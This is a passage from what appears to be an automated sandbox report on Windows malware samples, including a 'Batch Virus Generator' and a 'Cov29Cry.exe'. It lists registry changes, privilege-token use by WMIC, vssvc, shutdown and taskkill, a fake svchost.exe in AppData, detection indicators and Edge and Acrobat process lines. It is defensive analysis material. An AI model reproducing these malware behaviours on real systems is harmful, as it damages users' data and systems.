| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell\Read | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "50" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 412264.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 664769.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 732348.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 539169.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\auditpol.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc482146f8,0x7ffc48214708,0x7ffc48214718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6532 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6996 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MLG.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FBB10F6989A82C622FCCF472A06C3FB0 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8F6A3CA4AF03EAF849DD7A013701E9F6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 